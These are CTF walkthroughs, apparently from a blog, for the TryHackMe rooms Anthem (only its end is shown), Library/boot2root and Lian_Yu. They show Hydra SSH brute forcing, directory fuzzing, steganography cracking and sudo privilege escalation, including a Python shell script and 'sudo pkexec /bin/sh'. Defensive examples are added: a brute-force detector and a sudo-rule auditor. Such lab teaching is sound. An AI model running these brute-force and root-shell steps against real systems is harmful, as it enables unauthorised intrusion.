We can see that nmap identified 5 open ports on the target machine: port 80, port 135, port 139, port 445 and port 3389.

From the Nmap scan we've got the answers to the second and third questions on TryHackMe.

Let’s open the website in our browser.

Let's check the website's "/robots.txt", where we find some interesting details, including a possible password.

We've got the answers to the fourth and fifth questions on TryHackMe.

We searched the above-mentioned directories and found a login page.

Scroll down to the bottom and you will see a post, "A cheers to our IT department".

We searched the poem on Google and got the admin username.

Scroll down to the bottom of the web page and you will see the domain name of the website.

We've got the answers to the sixth and seventh questions on TryHackMe.

From this page, we understood that the email of the HR team is JD@anthem.com: the short form of the name is used for the email address. Similarly, we know the admin's name is Solomon Grundy, so the admin's email would be sg@anthem.com.

We've got the answer to the eighth question on TryHackMe.

Task 2: Spot the flags

Go to the main website and then to the "We are Hiring" page. Open the source code and you will find the first and second flags there.

We've got the answers to the first and second questions on TryHackMe.

For the third flag, click on "Jane Doe" in the "We are Hiring" page section.

The fourth flag is in the source code of the "A cheers to our IT department" page.

We've got all four answers to the questions on TryHackMe.

Task 3: Final Stage

We've got the username "SG" and the password "UmbracoIsTheBest". Now access the remote machine over RDP. Enter the username and password. The RDP command is rdesktop -u SG <IP address>

From the desktop, we've got the user flag.

Now we need to get root.txt, but first we need to become the administrator.

As the hint says, there is a hidden file on the system which contains the admin password. The hidden admin password is inside the backups folder on the C: drive. You need to change permissions to access the file.

We don't have permission to read the file "restore.txt", so we changed the permissions of the file from Properties > Security. We assigned read permission to "Everyone".

As a normal user we opened the file, and now we have the administrator password.

We ran PowerShell as administrator and listed the directories.

We switched to the Administrator's Desktop and got the flag.

Using the more command, we viewed the flag.

Now we need to answer the questions on TryHackMe.

Finally, we've completed the room!

Conclusion

I believe you enjoyed cracking the Simple CTF box and learned something new today. I would like to thank TryHackMe for making this box free (without a subscription) and the author of the box, Chevalier.

boot2root -CTF on TryHackME

Today I am going to show you how to solve the boot2root CTF challenge on TryHackMe. It is a beginner level box; we need to get the user flag and the root flag.

As a first step, we need to ensure connectivity between our machine and the TryHackMe machine. Start the VPN to connect to the TryHackMe network, then deploy the machine.

Active machine information (TryHackMe panel): room "Library", IP 10.10.184.84.

Once the machine is deployed, check connectivity by pinging the target machine.


Step:1

The first step towards successful exploitation is reconnaissance, so we started with a basic Nmap scan.

root@kali:/home/kali# nmap 10.10.184.84
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-26 23:59 EDT
Nmap scan report for 10.10.184.84
Host is up (0.17s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

As we can see, Nmap identified two open ports on the target machine: port 22 (SSH) and port 80 (HTTP). We cannot do anything with the SSH port right now, as we do not have credentials to log in. So, we will go with the HTTP port.

We’ve opened the target website in the browser.

[Screenshot: http://10.10.184.84/ shows a blog post titled “This is the title of a blog post”, “Posted on June 29th 2009 by meliodas, 3 Comments”, followed by Lorem ipsum body text]

Step:2

For any attack, enumeration is the key. When enumerating a website, note down the following:

  1. Check the website for every bit of small data.
  2. Always check “/robots.txt” directory of a website.
  3. Check the source code.
  4. Brute-force the directories using gobuster or dirbuster.

Did you notice? The author’s name is mentioned in the blog: “Posted by meliodas”. This means “meliodas” is one of the users on the machine.

Step:3

Now we know the username and we need a password to log in, so let’s brute force the SSH port with Hydra and the rockyou.txt wordlist. rockyou.txt is a wordlist found on your Kali machine at “/usr/share/wordlists/rockyou.txt”.

hydra -l meliodas -P /usr/share/wordlists/rockyou.txt 10.10.184.84 ssh
Hydra v9.0 (c) van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-07-27 01
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344400 login tries, ~896525 tries per task
[DATA] attacking
[STATUS] 178.00 tries/min, 178 tries in 00:01h, 14344225 to do
host: 10.10.184.84   login: meliodas   password: iloveyou1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-07-27 01:18:09

You will see the password of “meliodas” pop up on your screen.

Username: “meliodas”
Password: “iloveyou1”
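As an added example (not part of the original post), here is what the defender’s side of that Hydra run looks like: a small Python detector that parses sshd log lines, flags a source IP that crosses a failure threshold inside a time window, and escalates when a successful login follows the burst. The log lines and the IP addresses in them are constructed for the example.

```python
"""Flag SSH password-guessing bursts in sshd log lines.

Added example, not part of the original post. The Hydra run above produces
hundreds of "Failed password" entries per minute from one source IP before a
single "Accepted password" line. This detector groups failures per source IP in
a sliding window and reports any IP that crosses a threshold, and separately any
success that follows a flagged burst (the pattern a defender most wants to see).
The log lines below are constructed; the format follows the sshd/syslog style
used on Ubuntu.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample: a burst of failures against "meliodas" from one IP, then a
# success from the same IP, plus an unrelated single failure from another IP.
SAMPLE_LOG = """\
Jul 27 01:17:02 ubuntu sshd[1201]: Failed password for meliodas from 192.0.2.10 port 51000 ssh2
Jul 27 01:17:02 ubuntu sshd[1202]: Failed password for meliodas from 192.0.2.10 port 51001 ssh2
Jul 27 01:17:03 ubuntu sshd[1203]: Failed password for meliodas from 192.0.2.10 port 51002 ssh2
Jul 27 01:17:03 ubuntu sshd[1204]: Failed password for meliodas from 192.0.2.10 port 51003 ssh2
Jul 27 01:17:04 ubuntu sshd[1205]: Failed password for meliodas from 192.0.2.10 port 51004 ssh2
Jul 27 01:17:05 ubuntu sshd[1206]: Failed password for invalid user admin from 198.51.100.7 port 40000 ssh2
Jul 27 01:17:09 ubuntu sshd[1207]: Accepted password for meliodas from 192.0.2.10 port 51005 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s+\d\d:\d\d:\d\d)\s+\S+\s+sshd\[\d+\]:\s+"
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+)"
    r" from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+"
)


def parse_line(line, year=2020):
    """Return (timestamp, result, user, ip), or None for lines that are not auth events."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; the caller supplies it.
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2020):
    """Return a list of alert dicts.

    An IP is flagged when `threshold` failures fall within `window_seconds`;
    a later success from a flagged IP raises a higher-severity alert.
    """
    failures = defaultdict(deque)  # ip -> timestamps of recent failures
    flagged = set()
    alerts = []
    for line in log_text.splitlines():
        parsed = parse_line(line, year)
        if parsed is None:
            continue
        ts, result, user, ip = parsed
        if result == "Failed":
            q = failures[ip]
            q.append(ts)
            # Drop failures that fell out of the window.
            while q and (ts - q[0]).total_seconds() > window_seconds:
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged.add(ip)
                alerts.append({"severity": "medium", "ip": ip, "user": user,
                               "reason": f"{len(q)} failed logins within {window_seconds}s"})
        elif result == "Accepted" and ip in flagged:
            alerts.append({"severity": "high", "ip": ip, "user": user,
                           "reason": "successful login after a password-guessing burst"})
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```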

Now, let’s log in over SSH. The command is ssh meliodas@<ip_of_machine>.

ssh meliodas@10.10.184.84
The authenticity of host '10.10.184.84 (10.10.184.84)' can't be established.
ECDSA key fingerprint is SHA256:sKxkgmnt79RkNN7Tn25FLAOEHcu3yi1858DSdzrX4Dc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.184.84' (ECDSA) to the list of known hosts.
meliodas@10.10.184.84's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-159-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

Last login: Sat Aug 24 2019 from 192.168.15.118

We got shell access as user meliodas. Using the ls command we found two files in the present working directory: user.txt and bak.py. Using the cat command we got the user flag.

meliodas@ubuntu:~$ ls
bak.py  user.txt
meliodas@ubuntu:~$ cat user.txt

We got the user flag, which is the answer to the 1st question on TryHackMe.


Step:4

Now we need to find the root flag. Type the sudo -l command and you will see which commands “meliodas” can run as root (via sudo).

This user can run “/usr/bin/python*” and “/home/meliodas/bak.py” with sudo, that is, as root.

So, let’s see what’s inside the “bak.py” file.

No useful information. We need to change the contents of the file to use it to our advantage. However, we cannot write to this file as we do not have permission to do so. Therefore, we will delete it and create a new file with the same name.

meliodas@ubuntu:~$ rm bak.py
rm: remove write-protected regular file 'bak.py'? yes
meliodas@ubuntu:~$ ls
user.txt

Create a new file with this command. Refer to GTFOBins https://gtfobins.github.io/gtfobins/python/ for ‘import os; os.system(“/bin/sh”)’.

This command will spawn a new shell. Note that if we run bak.py without sudo, it will not give us a root shell, because it runs as our own user. If we run it with sudo, it runs as root and gives us a root shell.

Now that we have root privileges, we switched to the root directory using “cd”. Then using the “ls” command we found the file root.txt and viewed its content using the “cat” command.

Here we go! We’ve got the root flag, the answer to the 2nd question on TryHackMe.

Conclusion

I believe you have enjoyed today’s box, Library, the boot2root machine for the FIT and BSides Guatemala CTF on TryHackMe, and learned something new. I would like to thank TryHackMe for making this box free (without being subscribed) and the author of the box, stuxnet.

Hack Lian_Yu on TryHackMe

Today I am going to take you through a beginner level room on TryHackMe. The Lian_Yu room is based upon the TV series, and cracking this box requires techniques like fuzzing, steganography and privilege escalation. So I am sure you will be learning something new today, and it’s going to be fun.

First things first, make sure you are connected to the TryHackMe VPN and have deployed the machine.

cd Downloads
su root
Password:
root@kali:/home/kali/Downloads# sudo openvpn WebExercise.ovpn
Thu Jul 23 2020 OpenVPN 2.4.9 x86_64-pc-linux-gnu (ope
Thu Jul 23 2020 library versions: OpenSSL 1.1.1g 21 Apr 20
Thu Jul 23 04:43:05 2020 Outgoing Control Channel Authentication: Us
Thu Jul 23 04:43:05 2020 Incoming Control Channel Authentication: Us

[Screenshot: Active Machine Information; Title: Lian_Yu, IP Address: 10.10.166.38, Expires in 59m 45s]

Once the machine is deployed, the next step is to ping the TryHackMe machine to make sure it is reachable.

$ ping 10.10.166.38
PING 10.10.166.38 (10.10.166.38) 56(84) bytes of data.
64 bytes from 10.10.166.38: icmp_seq=1 ttl=63 time=153 ms
64 bytes from 10.10.166.38: icmp_seq=2 ttl=63 time=153 ms
64 bytes from 10.10.166.38: icmp_seq=3 ttl=63 time=154 ms
64 bytes from 10.10.166.38: icmp_seq=4 ttl=63 time=153 ms

Now everything is ready. Let’s start our hacking!

Step-1

The first step is always to start with Nmap scanning:

“nmap -sV -Pn -v <target IP>”

nmap -sV -Pn -v 10.10.166.38
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-23 04:51 EDT
NSE: Loaded 45 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 04:51
Completed Parallel DNS resolution of 1 host. at 04:51, 0.01s elapsed
Initiating Connect Scan at 04:51
Scanning 10.10.166.38 [1000 ports]
Discovered open port 111/tcp on 10.10.166.38
Discovered open port 22/tcp on 10.10.166.38
Discovered open port 21/tcp on 10.10.166.38
Discovered open port 80/tcp on 10.10.166.38
Completed Connect Scan at 04:51, 19.97s elapsed (1000 total ports)
Initiating Service scan at 04:51
Scanning 4 services on 10.10.166.38
Completed Service scan at 04:51, 6.42s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.166.38.
Initiating NSE at 04:51
Completed NSE at 04:51, 2.79s elapsed
Initiating NSE at 04:51
Completed NSE at 04:51, 0.66s elapsed
Nmap scan report for 10.10.166.38
Host is up (0.16s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
80/tcp  open  http    Apache httpd
111/tcp open  rpcbind 2-4 (RPC #100000)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

From the Nmap output, we understood that there were four services running, on ports 21, 22, 80 and 111.

As usual, let’s explore the HTTP service in the browser.

[Screenshot: http://10.10.166.38/ shows a page titled “Purgatory” with the heading ARROWVERSE and a paragraph about Oliver Queen, the island of Lian Yu and its location in the China Sea]

We understood it is about a television series; apart from that we didn’t get any other information. Now let’s try the “Gobuster” tool. Gobuster is a tool used to brute-force URIs (directories and files) on web sites and DNS subdomains (with wildcard support).

gobuster dir -u http://10.10.166.38 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
[+] Url:          http://10.10.166.38
[+] Wordlist:     /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt
[+] User Agent:   gobuster/3.0.1
[+] Timeout:      10s
2020/07/23 starting gobuster
/island (Status: 301)

“Gobuster” says there is a directory called “/island”. Let’s try /island in the URL.

[Screenshot: http://10.10.166.38/island/ reads: “Ohhh Noo, Don't Talk. I wasn't Expecting You at this Moment. I will meet you there. You should find a way to Lian_Yu as we are planed. The Code Word is:”]

The web page doesn’t contain any useful information. Let us see what is in the background of the page.

[Screenshot: right-click context menu on the /island/ page, choosing “View Page Source”]

We’ve got a code word, “vigilante”. At this moment we have no clue what it is; however, we need to note down this detail as part of enumeration.

Step-2

We don’t have any details except the code word “vigilante”. The only option we have right now is brute force, treating “vigilante” as a username.

To brute force, we need to download SecLists. Now you may wonder what SecLists is. SecLists is the security tester’s companion: a collection of multiple types of lists used during security assessments.

For more info visit https://github.com/danielmiessler/SecLists

Since it is not available in Kali Linux, we need to install it separately. The installation of SecLists is as follows.

[Screenshot: the GitHub page https://github.com/danielmiessler/SecLists with the “Code” menu open, showing the clone URL]

Git clone SecLists from GitHub as shown below.

kali@kali:~$ git clone https://github.com/danielmiessler/SecLists.git
Cloning into 'SecLists'...
remote: Enumerating objects: 9232, done.
remote: Total 9232 (delta 0), reused 0 (delta 0), pack-reused 9232
Receiving objects: 100% (9232/9232), 703.41 MiB | 1.67 MiB/s, done.
Resolving deltas: 100% (4776/4776), done.

Now that we’ve downloaded SecLists, let’s brute force using “ffuf”. ffuf is a fast web fuzzer written in Go.

ffuf -u http://10.10.166.38/island/FUZZ -w /usr/share/wordlists/SecLists/Fuzzing/4-digits-0000-9999.txt

       v1.0.2

 :: Method           : GET
 :: URL              : http://10.10.166.38/island/FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Matcher          : Response status:

2100                    [Status: 301, Size: 240, Words: 14, Lines: 8]
:: Progress: [10000/10000] :: Job [1/1] :: 222 req/sec :: Errors:

As a result of fuzzing with ffuf, we got a directory, “2100”. Let’s see what information we get from the 2100 directory in the URL.

We got .ticket, so we need to fuzz again to get more information. The idea of this fuzzing is to find any entries ending with .ticket.

kali@kali:~$ ffuf -u http://10.10.1.105/island/2100/FUZZ.ticket -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

       v1.0.2

 :: Method           : GET
 :: URL              : http://10.10.1.105/island/2100/FUZZ.ticket
 :: Follow redirects : false
 :: Calibration      : false
 :: Matcher          : Response status:

As a result of fuzzing, we’ve got “green_arrow”.

# Priority ordered case sensative list, where entries were found   [Status: 200, Size: 292, Words: 27, Lines: 17]
# ...                   [Status: 200, Size: 292, Words: 27, Lines: 17]
# ...                   [Status: 200, Size: 292, Words: 27, Lines: 17]
green_arrow             [Status: 200, Size: 71, Words: 10, Lines: 7]
:: Progress: [220560/220560] :: Job [1/1] :: 235 req/sec :: Duration: [0:15:37] :: Errors:

Let us open green_arrow.ticket in the URL.

[Screenshot: view-source:http://10.10.1.105/island/2100/green_arrow.ticket reads “This is just a token to get into Queen's Gambit(Ship)” followed by the token RTy8yhBQdscX]

We got another code similar to “vigilante”, i.e. “RTy8yhBQdscX”. Let us ask our best friend “Google”. Google said it is Base58 encoding (an encoding, not encryption, so it can be decoded without any key). Let’s decode it using a Base58 decoder.

[Screenshot: the online Base58 Decoder at browserling.com/tools/base58-decode with the token pasted in]

The output of the Base58 decoder looks like a password, “!#th3h00d”. Let’s note it down and try it with FTP, which is running on port 21.
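As an added example (not code from the original post or from the online tool used above), the following Python implements Base58 decoding and encoding itself, so a token like this can be checked offline without pasting it into a third-party site; the only page value it uses is the token RTy8yhBQdscX.

```python
"""Base58 encode/decode, the encoding used for the green_arrow.ticket token.

Added example, not part of the original post. Base58 is an encoding, not a
cipher: the Bitcoin alphabet (no 0, O, I or l, to avoid look-alike characters)
is applied to the big-endian integer value of the bytes, and leading zero bytes
are written as leading "1" characters. The ticket value below is the one quoted
on the page; the decoder reproduces the result the online tool gave.
"""
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
INDEX = {ch: i for i, ch in enumerate(ALPHABET)}


def base58_decode(text: str) -> bytes:
    """Decode a Base58 string; raises ValueError on characters outside the alphabet."""
    value = 0
    for ch in text:
        if ch not in INDEX:
            raise ValueError(f"invalid Base58 character {ch!r}")
        value = value * 58 + INDEX[ch]
    # Leading '1' characters encode leading zero bytes, which the integer loses.
    zeros = len(text) - len(text.lstrip("1"))
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    return b"\x00" * zeros + body


def base58_encode(data: bytes) -> str:
    """Inverse of base58_decode."""
    ze = len(data) - len(data.lstrip(b"\x00"))
    value = int.from_bytes(data, "big")
    digits = []
    while value:
        value, rem = divmod(value, 58)
        digits.append(ALPHABET[rem])
    return "1" * ze + "".join(reversed(digits))


def looks_like_base58(text: str) -> bool:
    """Triage check for a found token: True only if every character is in the alphabet."""
    return bool(text) and all(ch in INDEX for ch in text)


TICKET_TOKEN = "RTy8yhBQdscX"  # value quoted on the page

if __name__ == "__main__":
    print(base58_decode(TICKET_TOKEN).decode())
```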

Step-3

In our initial Nmap scan we found the FTP service running on port 21, and it is open. Now we have the username “vigilante” and the password “!#th3h00d”.

ftp 10.10.1.105
Connected to 10.10.1.105.
220 (vsFTPd 3.0.2)
Name (10.10.1.105:kali): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001       511720 May 01 03:26 Leave_me_alone.png
-rw-r--r--    1 1001     1001       549924 May 05 11:10 Queen's_Gambit.png
-rw-r--r--    1 1001     1001       191026 May 01 03:25 aa.jpg
226 Directory send OK.

Here we go! We got access to FTP. When we ran the “ls” command to see the contents of the present working directory, we got three images. To check for hidden files in the directory we used the command “ls -al”.

ftp> ls -al
227 Entering Passive Mode
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 May 05 11:10 .
drwxr-xr-x    3 1001     1001         4096 May 01 05:38 ..
-rw-r--r--    1 1001     1001           44 May 01       .bash_history
-rw-r--r--    1 1001     1001          220 May 01       .bash_logout
-rw-r--r--    1 1001     1001         3515 May 01       .bashrc
-rw-r--r--    1 1001     1001         2483 May 01       .other_user
-rw-r--r--    1 1001     1001          675 May 01       .profile
-rw-r--r--    1 1001     1001       511720 May 01 03:26 Leave_me_alone.png
-rw-r--r--    1 1001     1001       549924 May 05 11:10 Queen's_Gambit.png
-rw-r--r--    1 1001     1001       191026 May 01 03:25 aa.jpg
226 Directory send OK.

The listing shows there are many hidden files, which need to be copied to the local system for further investigation. Using the get command we copied all the files to the local system, i.e. the Kali machine.

ftp> get Leave_me_alone.png
local: Leave_me_alone.png remote: Leave_me_alone.png
227 Entering Passive Mode
150 Opening BINARY mode data connection for Leave_me_alone.png (511720 bytes).
226 Transfer complete.
511720 bytes received in 3.76 secs (132.9663 kB/s)
ftp> get Queen's_Gambit.png
local: Queen's_Gambit.png remote: Queen's_Gambit.png
227 Entering Passive Mode
150 Opening BINARY mode data connection for Queen's_Gambit.png (549924 bytes).
226 Transfer complete.
549924 bytes received in 2.73 secs (196.9627 kB/s)
ftp> get aa.jpg
local: aa.jpg remote: aa.jpg
227 Entering Passive Mode
150 Opening BINARY mode data connection for aa.jpg (191026 bytes).
226 Transfer complete.
191026 bytes received in 1.15 secs (162.8378 kB/s)

We’ve created a directory in the Kali machine and copied all the files into it.

[Screenshot: ls -al of the local working directory on Kali, listing aa.jpg, aa.jpg.out, .bash_history, Leave_me_alone.png, .other_user, passwd.txt, .profile and Queen's_Gambit.png]

Sometimes the information we are looking for is hidden inside a picture; this is called steganography. Steghide is a steganography program that is able to hide data in various kinds of image and audio files.

We need to use the steghide program to extract the information from the image.

steghide extract -sf aa.jpg
Enter passphrase:

Unfortunately it asks for a passphrase, which we don’t know. Now we need to crack the passphrase. For that we download StegCracker from GitHub and, once the files are downloaded, use StegCracker to crack the passphrase protecting the data in the image file.

root@kali:~# git clone https://github.com/paradoxis/stegcracker.git
Cloning into 'StegCracker'...
remote: Enumerating objects: 61, done.
remote: Counting objects: 100% (61/61), done.
remote: Compressing objects: 100% (41/41), done.
remote: Total 247 (delta 23), reused 45 (delta 15), pack-reused 186
Receiving objects: 100% (247/247), 1.64 MiB | 968.00 KiB/s, done.
Resolving deltas: 100% (109/109), done.

Using StegCracker, we identified the passphrase. The password is “password”.

kali@kali:~$ stegcracker aa.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)

Counting lines in wordlist..
Attacking file 'aa.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: password
Tried 964 passwords
Your file has been written to: aa.jpg.out
password

Step-4

The next step is to extract the hidden data from the image file using the steghide command and the recovered password.

steghide extract -sf aa.jpg
Enter passphrase:
wrote extracted data to "ss.zip".

We got a zip file, “ss.zip”, and unzipped it using the unzip command. There are two files, “passwd.txt” and “shado”. To see their content, we used the cat command.

unzip ss.zip
Archive:  ss.zip
  inflating: passwd.txt
  inflating: shado

cat passwd.txt
This is your visa Land on Lian_Yu # Just for Fun ***
a small Note about it

Having spent years on the island, Oliver learned how to be resourceful and
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.

We didn’t get any information from passwd.txt, but we got a password from shado, i.e. “M3tahuman”.

At this moment we are not sure whether “M3tahuman” is a password. We need to see the content of the other files which we copied from the victim’s machine.

Step-5

The “.other_user” file is one of the hidden files we copied to the local system for investigation. Let us see the contents of the .other_user file.

Using the cat command we viewed the contents of .other_user.

cat .other_user
Slade Wilson was 16 years old when he enlisted in the United States Army, having lied about his age. After serving a stint in Korea, he was later assigned to Camp Washington where he had been promoted to the rank of major. In the early 1960s, he met Captain Adeline Kane, who was tasked with training young soldiers in new fighting techniques in anticipation of brewing troubles taking place in Vietnam. Kane was amazed at how skilled Slade was and how quickly he adapted to modern conventions of warfare. She immediately fell in love with him and realized that he was without a doubt the most able-bodied combatant that she had ever encountered. She offered to privately train Slade in guerrilla warfare. In less than a year, Slade mastered every fighting form presented to him and was soon promoted to the rank of lieutenant colonel. Six months later, Adeline and he were married and she became pregnant with their first child. The war in Vietnam began to escalate and Slade was shipped overseas. In the war, his unit massacred a village, an event which sickened him. He was also rescued by SAS member Wintergreen, to whom he would later return the favor.

Chosen for a secret experiment, the Army imbued him with enhanced physical powers in an attempt to create metahuman super-soldiers for the U.S. military. Deathstroke became a mercenary soon after the experiment when he defied orders and rescued his friend Wintergreen, who had been sent on a suicide mission by a commanding officer with a grudge. [7] However, Slade kept this career secret from his family, even though his wife was an expert military combat instructor.

A criminal named the Jackal took his younger son Joseph Wilson hostage to force Slade to divulge the name of a client who had hired him as an assassin. Slade refused, claiming it was against his personal honor code. He attacked and killed the kidnappers at the rendezvous. Unfortunately, Joseph's throat was slashed by one of the criminals before Slade could prevent it, destroying Joseph's vocal cords and rendering him mute.

After taking Joseph to the hospital, Adeline was enraged at his endangerment of her son and tried to kill Slade by shooting him, but only managed to destroy his right eye. Afterwards, his confidence in his physical abilities was such that he made no secret of his impaired vision, marked by his mask which has a black, featureless half covering his lost right eye. Without his mask, Slade wears an eyepatch to cover his eye.

From the paragraph, we found the name “slade” and the word “metahuman”. This could be the username, and the password would be “M3tahuman”. Let’s try it with FTP.

ftp -p 10.10.1.105
Connected to 10.10.1.105.
220 (vsFTPd 3.0.2)
Name (10.10.1.105:kali): slade
530 Permission denied.
Login failed.
ftp> exit
221 Goodbye.

FTP didn’t accept the username and password. Let’s try SSH with the same credentials.

ssh slade@10.10.1.105
slade@10.10.1.105's password:
Way To SSH...
Loading...
...Done
Connecting To Lian_Yu Happy Hacking
slade@LianYu:~$

Here we go, we’ve got SSH access as a user with limited privileges. The user name is LianYu. As usual, let’s see all the files in the present working directory using the “ls” command. We found a text file, “user.txt”. To view the content we used the cat command.

cat user.txt
COMPUT3R5_DON'T
Felicity Smoak

Here we go! We got the user flag. Now we need to find the root user flag.

Step-6

We got a shell as a normal user. To get the root flag, we need root privileges, so we need to escalate privileges from the normal user to root.

As a first step, let us check which files and programs LianYu has permission to run with sudo. For that we executed the “sudo -l” command.

sudo -l
[sudo] password for slade:
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, /usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

With sudo, LianYu can run the command “/usr/bin/pkexec”. Here we use GTFOBins. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. For more info see https://gtfobins.github.io/.

[Screenshot: the GTFOBins entry for pkexec, Sudo section: “It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on sudo.” Command shown: sudo pkexec /bin/sh]

We copied the command “pkexec /bin/sh”; to spawn a root shell we run it with sudo.

slade@LianYu:~$ sudo pkexec /bin/sh
# whoami
root

Here we go! We’ve got root access. As a first step, we check the files in the present working directory using the “ls” command. We found a .txt file, “root.txt”.
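Both privilege escalations on this page, boot2root’s sudo rule for /usr/bin/python* and /home/meliodas/bak.py and Lian_Yu’s (root) PASSWD: /usr/bin/pkexec, come from sudo rules that a routine audit would have flagged. As an added example, not part of either room or of the original post, this Python script audits sudo -l output for exactly those patterns; the sudo -l excerpts, the NOPASSWD tag on the first one and the writable-path model are constructed assumptions.

```python
"""Audit `sudo -l` output for rules that amount to handing out a root shell.

Added example, not part of the original post or of either TryHackMe room. It
models the two rules discussed on this page: boot2root lets meliodas run
/usr/bin/python* and a script inside his own home directory, and Lian_Yu lets
slade run /usr/bin/pkexec. The sudo -l text and the writable-path model below
are constructed for the example; the `is_writable` callback is injected so the
same audit can run on a real host with os.access(path, os.W_OK).
"""
import os
import re
from typing import Callable, Dict, List

# Binaries that execute arbitrary code or programs. Granting these under sudo is
# equivalent to granting a root shell; the names are the ones this page discusses.
INTERPRETERS = {"python", "python2", "python3", "perl", "ruby", "sh", "bash"}
LAUNCHERS = {"pkexec"}

# One command-list line as printed by `sudo -l`, e.g. "(root) PASSWD: /usr/bin/pkexec".
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?:(?:NO)?PASSWD:\s*)?(?P<cmds>.+)$")

Writable = Callable[[str, str], bool]


def audit_rule(user: str, rule: str, is_writable: Writable) -> List[Dict[str, str]]:
    """Return one finding per problem found in a single sudo rule line."""
    m = RULE_RE.match(rule.strip())
    if not m:
        return []
    findings = []
    for cmd in (c.strip() for c in m["cmds"].split(",")):
        if cmd == "ALL":
            findings.append({"command": cmd, "issue": "ALL grants every command"})
            continue
        tokens = cmd.split()
        path, base = tokens[0], os.path.basename(tokens[0]).rstrip("*")
        if "*" in path:
            # sudo expands the glob at match time, so the rule also covers any
            # future binary whose name starts with "python".
            findings.append({"command": cmd, "issue": "wildcard in command path"})
        if base in INTERPRETERS:
            findings.append({"command": cmd, "issue": "interpreter runs arbitrary code as root"})
        if base in LAUNCHERS:
            findings.append({"command": cmd, "issue": "launcher executes arbitrary programs as root"})
        # The command itself and any absolute-path argument (a script handed to an
        # interpreter) are replaceable if the user can write the file or its parent
        # directory; deleting and recreating bak.py above is exactly that case.
        for target in (t for t in tokens if t.startswith("/")):
            if is_writable(user, target) or is_writable(user, os.path.dirname(target)):
                findings.append({"command": cmd, "issue": f"user can replace {target}"})
    return findings


def audit_sudo_l(user: str, output: str, is_writable: Writable) -> List[Dict[str, str]]:
    """Audit every rule line in the output of `sudo -l` for `user`."""
    findings = []
    for line in output.splitlines():
        if line.lstrip().startswith("("):
            findings.extend(audit_rule(user, line, is_writable))
    return findings


# Constructed filesystem model: the only path each user can write is their home.
WRITABLE_PATHS = {"meliodas": {"/home/meliodas"}, "slade": {"/home/slade"}}


def model_writable(user: str, path: str) -> bool:
    return path in WRITABLE_PATHS.get(user, set())


# Constructed sudo -l excerpts in the shape shown on this page (the NOPASSWD tag
# on the first one is an assumption, not something the post shows).
BOOT2ROOT_SUDO_L = """\
User meliodas may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/python*, /home/meliodas/bak.py
"""
LIANYU_SUDO_L = """\
User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec
"""

if __name__ == "__main__":
    for user, text in (("meliodas", BOOT2ROOT_SUDO_L), ("slade", LIANYU_SUDO_L)):
        for finding in audit_sudo_l(user, text, model_writable):
            print(user, finding)
```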

# whoami
root
# pwd
/root
# ls

Using the cat command we viewed the content and got the root user flag.

# cat root.txt
Mission accomplished
You are injected me with Mirakuru:) -- Now slade Will become DEATHSTROKE.
-- DEATHSTROKE
Let me know your comments about this machine :)
